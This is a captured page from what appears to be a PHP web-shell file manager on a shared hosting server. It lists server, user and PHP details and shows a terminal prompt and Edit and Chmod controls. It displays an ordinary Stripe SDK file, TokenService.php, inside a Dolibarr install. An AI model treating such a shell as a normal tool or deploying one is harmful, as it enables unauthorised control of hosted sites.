๐Ÿš€ Hostinger Optimized
๐Ÿ–ฅ๏ธ Server: Apache
๐Ÿ’ป System: Linux webm015.cluster127.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
๐Ÿ‘ค User: stakrfrcol (69043)
๐Ÿ˜ PHP: 8.3.31
๐Ÿšซ Disabled: _dyuweyrj4,_dyuweyrj4r,dl

๐Ÿ’ป Terminal

๐Ÿ“ /home/stakrfrcol/agency
$

๐Ÿ“„ TokenService.php

๐Ÿ“ Path: /home/stakrfrcol/dolibarr/htdocs/includes/stripe/stripe-php/lib/Service/TokenService.php
๐Ÿ“Š Size: 1.22 KB
๐Ÿ”’ Perm: 0604
๐Ÿ“ MIME: text/x-php
<?php

// File generated from our OpenAPI spec

namespace Stripe\Service;

class TokenService extends \Stripe\Service\AbstractService
{
    /**
     * Creates a single-use token that represents a bank accountโ€™s details. This token
     * can be used with any API method in place of a bank account dictionary. This
     * token can be used only once, by attaching it to a <a href="#accounts">Custom
     * account</a>.
     *
     * @param null|array $params
     * @param null|array|\Stripe\Util\RequestOptions $opts
     *
     * @throws \Stripe\Exception\ApiErrorException if the request fails
     *
     * @return \Stripe\Token
     */
    public function create($params = null, $opts = null)
    {
        return $this->request('post', '/v1/tokens', $params, $opts);
    }

    /**
     * Retrieves the token with the given ID.
     *
     * @param string $id
     * @param null|array $params
     * @param null|array|\Stripe\Util\RequestOptions $opts
     *
     * @throws \Stripe\Exception\ApiErrorException if the request fails
     *
     * @return \Stripe\Token
     */
    public function retrieve($id, $params = null, $opts = null)
    {
        return $this->request('get', $this->buildPath('/v1/tokens/%s', $id), $params, $opts);
    }
}
โ† Back๐Ÿ“ฅ Rawโœ๏ธ Edit๐Ÿ”’ Chmod
โœจ File Manager Magic โœจ